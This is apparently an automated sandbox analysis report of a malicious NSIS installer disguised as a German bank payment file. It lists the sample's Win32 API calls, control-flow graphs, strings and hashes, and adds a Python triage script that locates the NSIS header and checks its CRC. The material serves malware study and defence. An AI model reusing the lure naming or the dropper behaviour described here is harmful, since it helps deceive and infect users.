control_flow_graph: rendered-graph data for the entry function at 00403350-0040388D (basic-block address ranges, called APIs and edges); the API calls it makes are listed under APIs below.
APIs
• SetErrorMode.KERNELBASE ref: 00403373
• GetVersion.KERNEL32 ref: 00403379
• lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033AC
• #17.COMCTL32(?,00000006,?,0000000A), ref: 004033E9
• OleInitialize.OLE32(00000000), ref: 004033F0
• SHGetFileInfoW.SHELL32(0079FEE0,00000000,?,?,00000000), ref: 0040340C
• GetCommandLineW.KERNEL32(007A7A20,NSIS Error,?,00000006,?,0000000A), ref: 00403421
• GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe",00000000,?,00000006,?,0000000A), ref: 00403434
• CharNextW.USER32(00000000,"C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe",?,?,00000006,?,0000000A), ref: 0040345B
  • Part of subcall function 00406639: GetModuleHandleA.KERNEL32(?,?,?,004033C2,0000000A), ref: 0040664B
  • Part of subcall function 00406639: GetProcAddress.KERNEL32(00000000,?), ref: 00406666
• GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,?,0000000A), ref: 00403595
• GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,?,0000000A), ref: 004035A6
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,?,0000000A), ref: 004035B2
• GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,?,0000000A), ref: 004035C6
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,?,0000000A), ref: 004035CE
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,?,0000000A), ref: 004035DF
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,?,0000000A), ref: 004035E7
• DeleteFileW.KERNELBASE(1033,?,00000006,?,0000000A), ref: 004035FB
  • Part of subcall function 0040625F: lstrcpynW.KERNEL32(?,?,00000400,00403421,007A7A20,NSIS Error,?,00000006,?,0000000A), ref: 0040626C
• OleUninitialize.OLE32(00000006,?,00000006,?,0000000A), ref: 004036C6
• ExitProcess.KERNEL32 ref: 004036E7
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe",00000000,00000006,?,00000006,?,0000000A), ref: 004036FA
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe",00000000,00000006,?,00000006,?,0000000A), ref: 00403709
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe",00000000,00000006,?,00000006,?,0000000A), ref: 00403714
• lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe",00000000,00000006,?,00000006,?,0000000A), ref: 00403720
• SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,?,0000000A), ref: 0040373C
• DeleteFileW.KERNEL32(0079F6E0,0079F6E0,?,007A9000,?,?,00000006,?,0000000A), ref: 00403796
• CopyFileW.KERNEL32(C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe,0079F6E0,00000001,?,00000006,?,0000000A), ref: 004037AA
• CloseHandle.KERNEL32(00000000,0079F6E0,0079F6E0,?,0079F6E0,00000000,?,00000006,?,0000000A), ref: 004037D7
• GetCurrentProcess.KERNEL32(?,0000000A,00000006,?,0000000A), ref: 00403806
• OpenProcessToken.ADVAPI32(00000000), ref: 0040380D
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403822
• AdjustTokenPrivileges.ADVAPI32 ref: 00403845
• ExitWindowsEx.USER32(00000002,80040002), ref: 0040386A
• ExitProcess.KERNEL32 ref: 0040388D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
• String ID: "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe$C:\Users\user\classrooms$C:\Users\user\classrooms\Hematologist$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
• API String ID: 2488574733-2827411212
• Opcode ID: 9d094df354a64ac00225b874e1f21de582985ea5e934b42c4bdb5f03e135a873
• Instruction ID: f8b53dcf82f20274bbdd851e6e7f34b77cfd1224ece1df9e86175f3a8edd883a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d094df354a64ac00225b874e1f21de582985ea5e934b42c4bdb5f03e135a873
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CED11371500310AAD7207F759D85B3B3AACEB41746F00493FF981B62E2DB7D8A458B6E

Control-flow Graph
[Rendered graph not recoverable from the extraction. Blocks of the function at 0x402ec1 that call into the Win32 API, taken from the graph data: 402ec1-402f0f (GetTickCount, GetModuleFileNameW, call 405d51); 402f1b-402f49 (call 40625f, call 405b7c, call 40625f, GetFileSize); 40306d-403097 (GlobalAlloc, call 403308, call 4030fa); 4030d1-4030ec (SetFilePointer, call 405d0c). The remaining blocks are internal calls to 402e5d, 4032f2, 403308, 405d0c and 40672c; the terminal block is 4030f3-4030f7. The executed/not-executed colouring of the original graph is not preserved.]
APIs
• GetTickCount.KERNEL32 ref: 00402ED2
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe,00000400,?,00000006,?,0000000A), ref: 00402EEE
  • Part of subcall function 00405D51: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405D55
  • Part of subcall function 00405D51: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,?,0000000A), ref: 00405D77
• GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe,C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00402F3A
Strings
• Inst, xrefs: 00402FA6
• Null, xrefs: 00402FB8
• C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, xrefs: 00402ED8, 00402EE7, 00402EFB, 00402F1B
• Error launching installer, xrefs: 00402F11
• soft, xrefs: 00402FAF
• C:\Users\user\Desktop, xrefs: 00402F1C, 00402F21, 00402F27
• C:\Users\user\AppData\Local\Temp\, xrefs: 00402ECB
• Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author, xrefs: 00403099
• "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe", xrefs: 00402EC1
• vy, xrefs: 00402F4F
Memory Dump Source
• Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: File$AttributesCountCreateModuleNameSizeTick
• String ID: "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author $Null$soft$vy
• API String ID: 4283519449-1778941832
• Opcode ID: 5b59a3334938b1ada53fb21aa8cc17301929ac982103e349ce86a46566e051fd
• Instruction ID: 5e1ca327f74bc56913369b9b8f7861415b50b435560b28898b8d4eae658a22e8
• Opcode Fuzzy Hash: 5b59a3334938b1ada53fb21aa8cc17301929ac982103e349ce86a46566e051fd
• Instruction Fuzzy Hash: BC51F171901209AFDB20AF65DD85B9E7EA8EB4035AF10803BF505B62D5CB7C8E418B5D
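The function at 0x402ec1 above is the NSIS installer stub's header loader: it opens its own image (GetModuleFileNameW, CreateFileW, GetFileSize), reads it in chunks while looking for the three signature words "Null", "soft" and "Inst", and falls through to the "Installer integrity check has failed" message when the stored CRC does not match. For triage of an NSIS-packaged loader such as this sample, the same scan tells you where the overlay (compressed header plus data blocks) begins, which is the offset to hand to an NSIS extractor. The script below is an added example and is not part of the Joe Sandbox report or of the sample; it implements that scan and check in Python from the public NSIS firstheader layout (Source/exehead/fileform.h in the NSIS source). Assumptions are marked in the code: the header sits on a 512-byte boundary (the stub itself reads in 512-byte steps), the CRC32 uses the zlib polynomial over the whole file up to the trailing 4 bytes, and the NO_CRC/FORCE_CRC flag semantics follow my reading of the stub. The installer image it runs on by default is constructed, not taken from the sample; pass a real file path to analyse one.

```python
"""Locate the NSIS firstheader inside an installer image and redo the stub's
integrity check. Constants and layout follow the public NSIS source
(Source/exehead/fileform.h); the default input image is constructed below."""
import struct
import zlib

FH_SIG = 0xDEADBEEF          # firstheader.siginfo
FH_NSINST = b"NullsoftInst"  # nsinst[0..2]: the words "Null", "soft", "Inst" as they sit in the file
FH_FLAGS_MASK = 0xF          # any higher flag bit set means "this is not the header"
FH_FLAGS_NO_CRC = 0x4
FH_FLAGS_FORCE_CRC = 0x8
# flags, siginfo, nsinst[3], length_of_header, length_of_all_following_data (little-endian)
FIRSTHEADER = struct.Struct("<II12sII")
SCAN_STEP = 512              # assumption: the stub reads itself in 512-byte chunks until the header turns up


def find_firstheader(data: bytes):
    """Return (offset, fields) of the first plausible firstheader, or None.

    Same acceptance test as the stub: signature words match, no unknown flag
    bits, and the claimed following data fits inside the file.
    """
    for pos in range(0, len(data) - FIRSTHEADER.size + 1, SCAN_STEP):
        flags, sig, nsinst, hdr_len, total_len = FIRSTHEADER.unpack_from(data, pos)
        if sig != FH_SIG or nsinst != FH_NSINST or flags & ~FH_FLAGS_MASK:
            continue
        if total_len > len(data) - pos:
            continue
        return pos, {
            "flags": flags,
            "length_of_header": hdr_len,
            "length_of_all_following_data": total_len,
            # Assumption from my reading of the NSIS source: the CRC is skipped only
            # when NO_CRC is set and FORCE_CRC is not.
            "crc_enforced": bool(flags & FH_FLAGS_FORCE_CRC) or not (flags & FH_FLAGS_NO_CRC),
        }
    return None


def check_crc(data: bytes, pos: int, total_len: int):
    """Recompute the installer CRC the way the stub does.

    NSIS keeps a CRC32 (zlib polynomial, initial value 0) in the last 4 bytes of
    the following data; it covers the whole file from offset 0, stub included,
    up to those 4 bytes. Returns (matches, stored, computed).
    """
    end = pos + total_len
    stored = struct.unpack_from("<I", data, end - 4)[0]
    computed = zlib.crc32(data[: end - 4]) & 0xFFFFFFFF
    return stored == computed, stored, computed


def build_sample(tamper: bool = False) -> bytes:
    """Constructed stand-in for an installer: 512 bytes of fake stub, a
    firstheader, opaque 'following data' and the trailing CRC. With
    tamper=True one bit of the data is flipped after the CRC was computed,
    which is what a damaged or patched download looks like to the stub."""
    stub = b"MZ" + b"\x00" * (SCAN_STEP - 2)         # not a real PE, just sector-aligned filler
    payload = b"\xAB" * 100                           # stands in for the compressed header and data blocks
    total_len = FIRSTHEADER.size + len(payload) + 4   # header + data + 4-byte CRC
    body = stub + FIRSTHEADER.pack(0, FH_SIG, FH_NSINST, len(payload), total_len) + payload
    crc = zlib.crc32(body) & 0xFFFFFFFF
    if tamper:
        body = body[:-1] + bytes([body[-1] ^ 0x01])
    return body + struct.pack("<I", crc)


def triage(data: bytes) -> dict:
    """One-shot summary for a file: where the overlay starts and whether it is intact."""
    hit = find_firstheader(data)
    if hit is None:
        return {"nsis": False}
    pos, fields = hit
    ok, stored, computed = check_crc(data, pos, fields["length_of_all_following_data"])
    return {"nsis": True, "overlay_offset": pos, "crc_ok": ok,
            "crc_stored": stored, "crc_computed": computed, **fields}


if __name__ == "__main__":
    import sys
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    for key, value in triage(image).items():
        if isinstance(value, int) and not isinstance(value, bool):
            print(f"{key}: {value:#x}")
        else:
            print(f"{key}: {value}")
```

Two caveats for using this on a malicious installer. The CRC is a transport check, not an authenticity check: the operator who built the dropper computed it, so a matching CRC says only that the file you have is the one that was shipped, and a mismatch usually means a truncated capture rather than a "defused" sample. And because the stub only looks at 512-byte boundaries, a header found elsewhere by a byte-wise grep for "NullsoftInst" would not be loaded by the real stub at all.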

Control-flow Graph
[Rendered graph not recoverable from the extraction. Blocks of the function at 0x40596d that call into the Win32 API, taken from the graph data: 405995-4059a7 (DeleteFileW); 4059d8-4059e3 (lstrcatW); 4059fb-405a01 (lstrcatW); 405a06-405a22 (lstrlenW, FindFirstFileW); 405aaf-405abf (FindNextFileW), which loops back to 405a28-405a30 until the enumeration ends at 405ac5-405ac6 (FindClose). Block 405a70-405a74 calls 40596d, i.e. the function calls itself, consistent with a recursive directory removal (FindFirstFileW/FindNextFileW walk plus DeleteFileW). The other blocks are internal calls to 405c38, 40625f, 405b7c, 4065a2, 405b30, 405925, 4052c3 and 406025; the terminal block is 405b29-405b2d. The executed/not-executed colouring of the original graph is not preserved.]
APIs
• DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76943420,00000000), ref: 00405996
• lstrcatW.KERNEL32(007A3F28,\*.*,007A3F28,?), ref: 004059DE
• lstrcatW.KERNEL32(?,0040A014,?,007A3F28,?), ref: 00405A01
• lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?), ref: 00405A07
• FindFirstFileW.KERNELBASE(007A3F28,?,?,?,0040A014,?,007A3F28,?), ref: 00405A17
• FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 00405AB7
• FindClose.KERNEL32(00000000), ref: 00405AC6
Strings
• \*.*, xrefs: 004059D8
• C:\Users\user\AppData\Local\Temp\, xrefs: 0040597B
• "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe", xrefs: 0040596D
• (?z, xrefs: 004059C6
Memory Dump Source
• Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
• String ID: "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe"$(?z$C:\Users\user\AppData\Local\Temp\$\*.*
• API String ID: 2035342205-1891069878
• Opcode ID: d19359472b600334dec94491de2483d8e144fed62e712032587100ce902314ed
• Instruction ID: bed3c70eefbd60b288d0e49403b05a90b1a02306e0e83ed8d7b57435798b36db
• Opcode Fuzzy Hash: d19359472b600334dec94491de2483d8e144fed62e712032587100ce902314ed
• Instruction Fuzzy Hash: 4341A430900A14AACF21AB65DC89EAF7678EF46724F10827FF406B11D1D77C5981DE6E

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 665 4065a2-4065b6 FindFirstFileW 666 4065c3 665->666 667 4065b8-4065c1 FindClose 665->667 668 4065c5-4065c6 666->668 667->668
APIs
• FindFirstFileW.KERNELBASE(?,007A4F70,fareafvrgende\Djrve27.gud,00405C81,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,00000000,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,?,?,76943420,0040598D,?,C:\Users\user\AppData\Local\Temp\,76943420), ref: 004065AD
• FindClose.KERNELBASE(00000000), ref: 004065B9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID: fareafvrgende\Djrve27.gud$pOz
• API String ID: 2295610775-1196040977
• Opcode ID: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
• Instruction ID: ff58ffc18adcfb1e82f863fe631525536c8ca60503d441656b10eafe22cb2dbc
• Opcode Fuzzy Hash: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
• Instruction Fuzzy Hash: 40D012315190206FC6005778BD0C84B7A989F463307158B36B466F11E4D7789C668AA8

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 139 403d1b-403d2d 140 403d33-403d39 139->140 141 403e6e-403e7d 139->141 140->141 142 403d3f-403d48 140->142 143 403ecc-403ee1 141->143 144 403e7f-403ec7 GetDlgItem * 2 call 4041f4 SetClassLongW call 40140b 141->144 147 403d4a-403d57 SetWindowPos 142->147 148 403d5d-403d60 142->148 145 403f21-403f26 call 404240 143->145 146 403ee3-403ee6 143->146 144->143 161 403f2b-403f46 145->161 151 403ee8-403ef3 call 401389 146->151 152 403f19-403f1b 146->152 147->148 154 403d62-403d74 ShowWindow 148->154 155 403d7a-403d80 148->155 151->152 174 403ef5-403f14 SendMessageW 151->174 152->145 160 4041c1 152->160 154->155 157 403d82-403d97 DestroyWindow 155->157 158 403d9c-403d9f 155->158 163 40419e-4041a4 157->163 165 403da1-403dad SetWindowLongW 158->165 166 403db2-403db8 158->166 164 4041c3-4041ca 160->164 168 403f48-403f4a call 40140b 161->168 169 403f4f-403f55 161->169 163->160 176 4041a6-4041ac 163->176 165->164 172 403e5b-403e69 call 40425b 166->172 173 403dbe-403dcf GetDlgItem 166->173 168->169 170 403f5b-403f66 169->170 171 40417f-404198 DestroyWindow EndDialog 169->171 170->171 178 403f6c-403fb9 call 406281 call 4041f4 * 3 GetDlgItem 170->178 171->163 172->164 179 403dd1-403de8 SendMessageW IsWindowEnabled 173->179 180 403dee-403df1 173->180 174->164 176->160 177 4041ae-4041b7 ShowWindow 176->177 177->160 209 403fc3-403fff ShowWindow KiUserCallbackDispatcher call 404216 EnableWindow 178->209 210 403fbb-403fc0 178->210 179->160 179->180 183 403df3-403df4 180->183 184 403df6-403df9 180->184 187 403e24-403e29 call 4041cd 183->187 188 403e07-403e0c 184->188 189 403dfb-403e01 184->189 187->172 192 403e42-403e55 SendMessageW 188->192 194 403e0e-403e14 188->194 189->192 193 403e03-403e05 189->193 192->172 193->187 197 403e16-403e1c call 40140b 194->197 198 403e2b-403e34 call 40140b 194->198 205 403e22 197->205 198->172 207 403e36-403e40 198->207 205->187 207->205 213 404001-404002 209->213 214 404004 209->214 210->209 215 404006-404034 GetSystemMenu EnableMenuItem SendMessageW 213->215 214->215 216 404036-404047 SendMessageW 215->216 217 404049 215->217 218 40404f-40408e call 404229 call 403cfc call 40625f lstrlenW call 406281 SetWindowTextW call 401389 216->218 217->218 218->161 229 404094-404096 218->229 229->161 230 40409c-4040a0 229->230 231 4040a2-4040a8 230->231 232 4040bf-4040d3 DestroyWindow 230->232 231->160 233 4040ae-4040b4 231->233 232->163 234 4040d9-404106 CreateDialogParamW 232->234 233->161 235 4040ba 233->235 234->163 236 40410c-404163 call 4041f4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 234->236 235->160 236->160 241 404165-404178 ShowWindow call 404240 236->241 243 40417d 241->243 243->163
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D57
• ShowWindow.USER32(?), ref: 00403D74
• DestroyWindow.USER32 ref: 00403D88
• SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DA4
• GetDlgItem.USER32(?,?), ref: 00403DC5
• SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DD9
• IsWindowEnabled.USER32(00000000), ref: 00403DE0
• GetDlgItem.USER32(?,00000001), ref: 00403E8E
• GetDlgItem.USER32(?,00000002), ref: 00403E98
• SetClassLongW.USER32(?,000000F2,?), ref: 00403EB2
• SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F03
• GetDlgItem.USER32(?,00000003), ref: 00403FA9
• ShowWindow.USER32(00000000,?), ref: 00403FCA
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FDC
• EnableWindow.USER32(?,?), ref: 00403FF7
• GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040400D
• EnableMenuItem.USER32(00000000), ref: 00404014
• SendMessageW.USER32(?,?,00000000,00000001), ref: 0040402C
• SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040403F
• lstrlenW.KERNEL32(007A1F20,?,007A1F20,00000000), ref: 00404069
• SetWindowTextW.USER32(?,007A1F20), ref: 0040407D
• ShowWindow.USER32(?,0000000A), ref: 004041B1
Memory Dump Source
• Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
• String ID:
• API String ID: 3282139019-0
• Opcode ID: fc3c2fd52c5859f2fd2362f058ebeec97e14ddaa85c60b8da330eda8cc3c5bb0
• Instruction ID: e7c2d8670a20ab778e0eeae1551072eac63d4844406393878d1a707f383ade6f
• Opcode Fuzzy Hash: fc3c2fd52c5859f2fd2362f058ebeec97e14ddaa85c60b8da330eda8cc3c5bb0
• Instruction Fuzzy Hash: B6C1CDB1504205AFDB206F61ED88E2B3A68EB96705F00853EF651B51F0CB399982DB1E

Control-flow Graph

